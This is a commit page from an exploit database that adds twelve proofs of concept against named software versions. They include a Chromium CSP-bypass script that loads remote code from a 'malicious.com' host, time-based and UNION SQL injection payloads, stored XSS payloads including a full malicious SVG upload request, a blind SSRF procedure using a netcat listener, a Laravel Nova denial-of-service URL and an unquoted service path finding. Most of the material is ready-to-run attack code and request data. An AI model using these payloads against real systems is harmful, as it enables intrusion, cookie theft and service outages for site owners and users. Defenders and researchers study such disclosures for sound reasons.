DB: 2020-12-05

13 changes to exploits/shellcodes

IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path
Chromium 83 - Full CSP Bypass
Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting
Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection
MiniCMS 1.10 - 'content box' Stored XSS
Testa Online Test Management System 3.4.7 - 'q' SQL Injection
Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting
Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting
Laravel Nova 3.7.0 - 'range' DoS
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)
Zabbix 5.0.0 - Stored XSS via URL Widget Iframe
This commit is contained in:
Offensive Security 2020-12-05 05:01:54 +00:00
parent d560e654b7
commit 045c2fe1ae
14 changed files with 388 additions and 1 deletions

View file

@ -1,4 +1,4 @@
# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
# Date: 2020-08-31
# Exploit Author: Jonatan Schor and Uriel Yochpaz
# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway

View file

@ -0,0 +1,34 @@
#Title: Chromium 83 - Full CSP Bypass
#Date: 02/09/2020
#Exploit Author: Gal Weizman
#Vendor Homepage: https://www.chromium.org/
#Software Link: https://download-chromium.appspot.com/
#Version: 83
#Tested On: Mac OS, Windows, iPhone, Android
#CVE: CVE-2020-6519
(function(){
var payload = `
top.SUCCESS = true;
var o = document.createElement("object");
o.data = \`http://malicious.com/bypass-object-src.html\`;
document.body.appendChild(o);
var i = document.createElement("iframe");
i.src = \`http://malicious.com/bypass-child-src.html\`;
document.body.appendChild(i);
var s = document.createElement("script");
s.src = \`http://malicious.com/bypass-script-src.js\`;
document.body.appendChild(s);
`;
document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>";
setTimeout(() => {
if (!top.SUCCESS) {
XXX.contentWindow.eval(payload);
}
});
}())
// further information: https://github.com/weizman/CVE-2020-6519

View file

@ -0,0 +1,26 @@
# Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
# Date: 03/12/2020
# Exploit Author: Pankaj Verma (_p4nk4j)
# Vendor Homepage: https://www.canto.com/integrations/wordpress/
# Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin
# Version: 1.3.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-28976, CVE-2020-28977, CVE-2020-28978
Description:-
The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities.
It allows an unauthenticated attacker to make a request to any Internal and External Server via "subdomain" parameter.
Vulnerable Parameters and Endpoints:-
https://target/wp-content/plugins/canto/includes/lib/detail.php?subdomain=
https://target/wp-content/plugins/canto/includes/lib/get.php?subdomain=
https://target/wp-content/plugins/canto/includes/lib/tree.php?subdomain=
Steps To Reproduce:-
1. Start a Netcat Listener on any port For e.g. 4499
2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/detail.php?subdomain="
3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter.
4. Observe the response we got from the Target on Attacker's Listener.
Note:- Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.

View file

@ -0,0 +1,36 @@
# Exploit Title: Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection
# Date: 2020-12-04
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/geraked/phpscript-sgh
# Software Link: https://github.com/geraked/phpscript-sgh
# Version: 0.1.0
# Tested on: Kali Linux
------------------------------------------------------------------------------------------------------------------------
Source code(localhost/admin/admins.php):
if ($_REQUEST['op']=='add') {
$id = $username = $password = $conf_password = $firstname = $lastname =
$email = $pic = $_SESSION['aapic'] = "";
}
else {
$result = $conn->query("SELECT * FROM sgh_admins WHERE
id=".test_input($_REQUEST['id'])." LIMIT 1");
$row = $result->fetch_assoc();
extract($row);
$_SESSION['aapic'] = $pic;
}
------------------------------------------------------------------------------------------------------------------------
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: op=edit&id=1 AND (SELECT 9367 FROM
(SELECT(SLEEP(5)))pBEE)&_pjax=#pjax-container
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: op=edit&id=-5015 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b716271,0x536b4e4a775448674c73477175675a4c58476659474f524b535456706e7276474251424a4f67744b,0x717a626b71),NULL--
-&_pjax=#pjax-container
------------------------------------------------------------------------------------------------------------------------

View file

@ -0,0 +1,33 @@
# Exploit Title: Testa Online Test Management System 3.4.7 - 'q' SQL Injection
# Date: 2020-07-21
# Google Dork: N/A
# Exploit Author: Ultra Security Team
# Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad Khalifeh , Milad Ranjbar
# Vendor Homepage: https://testa.cc
# Version: v3.4.7
# Tested on: Windows/Linux
# CVE: N/A
.:: Description ::.
Testa Helps You To make Online Exams.
.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target Using Testa - Online Test Management System.
Step 2 - Click on List And Search Exams.
Step 3 - Inject Your Payloads in Search Field.
.:: Sample Request ::.
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost
Cookie: PHPSESSID=7eg4b3fl6vm8a11kmkh4pkq290; testa_user2=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
p=1&q=-1' UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 #

View file

@ -0,0 +1,16 @@
# Exploit Title: Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting
# Date: 3-12-2020
# Exploit Author: Parshwa Bhavsar
# Vendor Homepage: https://compo.sr/
# Software Link: https://compo.sr/download.htm
# Version: 10.0.34
# Tested on: Windows 10/ Kali Linux
Steps To Reproduce :-
1. Install the CMS from the download link & configure it.
2. After configuration login with admin Credential .
3. You will notice “Add banner” in the top of the browser.
4. Click on it and Put XSS payload (any) in “Description” field.
5. Save it & Click on Home.
6. Every time any user visit the website , the XSS payload will trigger.

View file

@ -0,0 +1,16 @@
# Exploit Title: MiniCMS 1.10 - 'content box' Stored XSS
# Date: 2019-7-4
# Exploit Author: yudp
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link:https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# CVE :CVE-2019-13339
Payload<script>alert("3: "+document.domain)</script> In /MiniCMS/mc-admin/page-edit.php
POC:
1. Go to the page-edit page and input the payload into the content box ,click save button
2.Use burpsuite to edit the payload. Pay attention that the “+” needs to be url-encoded
3.After that, go to the page we have saved
4.Window will pop with the domain

View file

@ -0,0 +1,19 @@
# Exploit Title: Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting
# Date: 2020-09-02
# Exploit Author: Dhruv Patel(dhruvp111296)
# Vendor Homepage: https://savsoftquiz.com/
# Software Link: https://github.com/savsofts/savsoftquiz_v5.git
# Version: 5.0
# Tested on: Windows 10
Attack vector:
This vulnerability can results attacker to inject the XSS payload in admin
panel Custom Field section. And Inject JavaScript Malicious code & Steal
Users cookie
Vulnerable Parameters: title
Steps for reproduce:
1. Go to admin panels add custom fields page
2. Fill the Title name as <script>alert("HELLO XSS")</script> payload in title.
3. Now Click on Save we can see our payload gets executed.
4. All Users Can Show our Payload As a xss.

View file

@ -0,0 +1,16 @@
# Exploit Title: Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting
# Date: 04-12-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.formalms.org/download.html
# Software Link: https://www.formalms.org/
# Version: 2.3
# Tested on: Windows 10/Kali Linux
Steps-To-Reproduce:
1. Go to the Forma LMS and login to your account.
2. Now go to the User Profile.
3. Now Edit the profile.
4. Put the below payload in first and last name:
"<script>alert(document.cookie)</script>"
5. Now click on Save button.
6. The XSS will be triggered.

View file

@ -0,0 +1,16 @@
# Exploit Title: Laravel Nova 3.7.0 - 'range' DoS
# Date: June 22, 2020
# Exploit Author: iqzer0
# Vendor Homepage: https://nova.laravel.com/
# Software Link: https://nova.laravel.com/releases
# Version: Version v3.7.0
# Tested on: Manjaro / Chrome v83
An authenticated user can crash the application by setting a higher
value to the 'range' (default 30) parameter and sending simultaneous
requests (10 simultaneous requests was enough to DoS the server in my
testing)
Vulnerable URL:
https://example.com/nova-api/metrics/sum-orders?timezone=Indian%2FMaldives&twelveHourTime=true&range=3000000
Vulnerable Parameter: range

View file

@ -0,0 +1,92 @@
# Exploit Title: CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)
# Date: 04/12/2020
# Exploit Author: Eshan Singh
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads
# Version: cmsms v2.2.15
# Tested on: Windows/Kali Linux/Ubuntu
Description
----------------------
CMS Made Simple 2.2.15 allows an authenticated user with access to the
Content Manager to edit content and put persistent XSS payload using the
malicious SVG file. The user can get cookies from every authenticated user
who visits the website.
SVG Payload
-------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg
Steps to reproduce
-------------------
1. Login into the cmsms admin panel using the admin user.
2. then go to content > file manager > images, now upload the malicious svg
(
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg)
file.
3. now open the svg file location (
http://127.0.0.1/cmsms/uploads//images/SVG_XSS.svg) and BOOM! you got the
popup.
Burp Request
-------------
POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------379224531139948695983200896304
Content-Length: 1040
Origin: http://127.0.0.1
Connection: close
Cookie:
a3c9a2f9998cdfdc410fef5f094579cb8f2f3306=c36ffe152373337eee92ec4985172db8528361bf%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoicjB4NHIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkbElVM2FsR2l6UkR0dG5ROHJPVVwvd3V3M3hXano1M0wzYW9pVUhxT2pWQW4xaHNPNjZDLm9HIn0%3D;
__c=3d8ee0fbb464e874e82; CMSSESSID5d26ee9cb371=b1gen2isn6vf4g1sal7jdt5upv
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="mact"
FileManager,m1_,upload,0
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="__c"
3d8ee0fbb464e874e82
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="disable_buffer"
1
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="m1_files[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
-----------------------------379224531139948695983200896304--

View file

@ -0,0 +1,33 @@
# Exploit Title: Zabbix 5.0.0 - Stored XSS via URL Widget Iframe
# Date: 8/11/2020
# Exploit Author: Shwetabh Vishnoi
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/download
# Affected Version: Zabbix before 3.0.32rc1, 4.x before 4.0.22rc1, 4.1.x through 4.4.x before 4.4.10rc1, and 5.x before 5.0.2rc1
# CVE : CVE-2020-15803
Affected URL/endpoint(s):
http://192.168.1.7/zabbix.php?sid=f7ca8c8270ce38c7&action=dashboard.widget.check
Affected Param: <iframe src="http://localhost/hello.html" scrolling="auto"
id="iframe" class="widget-url" width="100%" height="100%"></iframe>
Description: The application contains a widget functionality within Global
View Dashboard which can be used by a malicious admin to propagate stored
cross site scripting attack. The “URL” widget iframe does not have any
inbuilt restrictions for the content executing within.
Impact: The malicious webpages within iframes can be used for hosting forms
for Phishing, malware propagation, forced redirections etc.
The affected Global View dashboard is displayed to all the users of the
application, so all the users will be affected with this vulnerability.
Reproduction Steps:
1. Login to the application with Admin
2. In Global View Dashboard, Add a widget
3. Select Type “URL”, fill any random values for Name, Refresh Interval.
4. Now, in the URL parameter, enter a malicious URL.
5. For demo purpose, I have hosted a web server on my machine and hosted a webpage http://localhost/hello.html. (Alternatively, you can use “ http://14.rs” to display popups.)
6. The malicious webpage containing payload will be executed on the dashboard via iFrame.
7. The executed content can redirect the user to a malicious page (We have used Bing page for redirection).

View file

@ -0,0 +1,38 @@
# Exploit Title: IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path
# Discovery by: Diego Cañada
# Software link: https://www.pconlife.com/download/otherfile/20566/90674cffc8658c4f2bf58d43bb9b7ccb/
# Discovery Date: 2020-12-03
# Tested Version: 1.0.6499.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home Single Language x64 ES
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i
"Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto
# Service info:
C:\>sc qc StacSV
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: StacSV
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe
GRUPO_ORDEN_CARGA : AudioGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : Audio Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.

View file

@ -11219,6 +11219,8 @@ id,file,description,date,author,type,platform,port
49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
49191,exploits/windows/local/49191.txt,"IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path",2020-12-04,"Diego Cañada",local,windows,
49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43406,3 +43408,13 @@ id,file,description,date,author,type,platform,port
49186,exploits/hardware/webapps/49186.txt,"Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion",2020-12-03,LiquidWorm,webapps,hardware,
49187,exploits/hardware/webapps/49187.txt,"Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure",2020-12-03,LiquidWorm,webapps,hardware,
49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,
49190,exploits/php/webapps/49190.txt,"Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting",2020-12-04,"Parshwa Bhavsar",webapps,php,
49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,
49193,exploits/php/webapps/49193.txt,"MiniCMS 1.10 - 'content box' Stored XSS",2020-12-04,yudp,webapps,php,
49194,exploits/multiple/webapps/49194.txt,"Testa Online Test Management System 3.4.7 - 'q' SQL Injection",2020-12-04,"Ultra Security Team",webapps,multiple,
49196,exploits/php/webapps/49196.txt,"Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting",2020-12-04,"Dhruv Patel",webapps,php,
49197,exploits/php/webapps/49197.txt,"Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting",2020-12-04,"Hemant Patidar",webapps,php,
49198,exploits/php/webapps/49198.txt,"Laravel Nova 3.7.0 - 'range' DoS",2020-12-04,iqzer0,webapps,php,
49199,exploits/php/webapps/49199.txt,"CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)",2020-12-04,"Eshan Singh",webapps,php,
49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,

Can't render this file because it is too large.